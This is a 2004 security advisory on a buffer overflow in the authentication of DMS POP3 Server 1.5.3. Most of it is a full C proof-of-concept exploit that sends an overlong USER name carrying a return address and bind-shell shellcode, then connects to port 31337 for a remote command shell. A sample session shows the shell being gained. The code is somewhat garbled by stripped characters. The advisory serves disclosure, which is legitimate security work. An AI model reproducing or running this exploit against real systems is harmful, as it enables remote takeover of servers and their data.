Buffer Overflow in Digital Mapping System's POP3 Server
A vulnerability exists in Digital Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could result in the remote execution of arbitrary code on the vulnerable system.
November 23, 2004
Reported November 22, 2004, by Reed Arvin.
VERSIONS AFFECTED
DESCRIPTION
A vulnerability exists in Digital Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could result in the remote execution of arbitrary code on the vulnerable system. A buffer overflow occurs during the POP3 authentication process when an overly long username is supplied. The buffer overflow could let a remote attacker cause the program to execute arbitrary code.
DEMONSTRATION
The discoverer posted the following code as proof of concept:
/*
DMS POP3 Remote BufferOverflow Exploit by NoPh0BiA - SECU
no@0x00:~/Exploits/DMS-Exploit$ ./DMS-exploit 10.20.30.2
***DMS POP3 Remote BufferOverflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 110.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 31337.
[x] Connected to: 10.20.30.2 on port 31337.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>
Greets to NtWaK0, kamalo, kane, schap.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 110
#define RPORT 31337
#define RET "x92x0DxFCx7F" /*win2k sp4*/
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4dx81"
"x59x47x83xebxfcxe2xf4xb1x69x0fx47x4dx81x0ax12x1b"
"xd6xd2x2bx69x99xd2x02x71x0ax0dx42x35x80xb3xccx07"
"x99xd2x1dx6dx80xb2xa4x7fxc8xd2x73xc6x80xb7x76xb2"
"x7dx68x87xe1xb9xb9x33x4ax40x96x4ax4cx46xb2xb5x76"
"xfdx7dx53x38x60xd2x1dx69x80xb2x21xc6x8dx12xccx17"
"x9dx58xacxc6x85xd2x46xa5x6ax5bx76x8dxdex07x1ax16"
"x43x51x47x13xebx69x1ex29x0ax40xccx16x8dxd2x1cx51"
"x0ax42xccx16x89x0ax2fxc3xcfx57xabxb2x57xd0x80xcc"
"x6dx59x46x4dx81x0ex11x1ex08xbcxafx6ax81x59x47xdd"
"x80x59x47xfbx98x41xa0xe9x98x29xaexa8xc8xdfx0exe9"
"x9bx29x80xe9x2cx77xaex94x88xacxeax86x6cxa5x7cx1a"
"xd2x6bx18x7exb3x59x1cxc0xcax79x16xb2x56xd0x98xc4"
"x42xd4x32x59xebx5ex1ex1cxd2xa6x73xc2x7ex0cx43x14"
"x08x5dxc9xafx73x72x60x19x7ex6exb8x18xb1x68x87x1d"
"xd1x09x17x0dxd1x19x17xb2xd4x75xcex8axb0x82x14x1e"
"xe9x5bx47x37xe8xd0xa7x27x91x09x10xb2xd4x7dx14x1a"
"x7ex0cx6fx1exd5x0exb8x18xa1xd0x80x25xc2x14x03x4d"
"x08xbaxc0xb7xb0x99xcax31xa5xf5x2dx58xd8xaaxecxca"
"x7bxdaxabx19x47x1dx63x5dxc5x3fx80x09xa5x65x46x4c"
"x08x25x63x05x08x25x63x01x08x25x63x1dx0cx1dx63x5d"
"xd5x09x16x1cxd0x18x16x04xd0x08x14x1cx7ex2cx47x25"
"xf3xa7xf4x5bx7ex0cx43xb2x51xd0xa1xb2xf4x59x2fxe0"
"x58x5cx89xb2xd4x5dxcex8exebxa6xb8x7bx7ex8axb8x38"
"x81x31xb7xc7x85x06xb8x18x85x68x9cx1ex7ex89x47";
struct sockaddr_in hrm;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip,int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(p);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
printf("[x] Connected to: %s on port %d.",ip,p);
return sockfd;
}
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: IP.");
exit(0);
}
int x,y;
char *buffer=malloc(1554),*A=malloc(1121),*B=malloc(30),*target=argv[1];
printf("***DMS POP3 Remote BufferOverflow exploit by NoPh0BiA.***");
memset(buffer,'',1554);
memset(A,0x41,1121);
memset(B,0x42,30);
strcat(buffer,A);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
x = conn(target,PORT);
printf("[x] Sending bad code..");
write(x,"USER ",5);
write(x,buffer,strlen(buffer));
write(x,"r",2);
printf("done.");
close(x);
sleep(3);
printf("[x] Trying to connect to: %s on port %d.",target,RPORT);
if((y=conn(target,RPORT)))
{
printf("[x] 0wn3d!");
shell(y);
}
close(y);
}
VENDOR RESPONSE
The vendor, Digital Mapping Systems, has released abulletin andpatch to address this vulnerability.
CREDIT
Discovered byReed Arvin.
About the Author
You May Also Like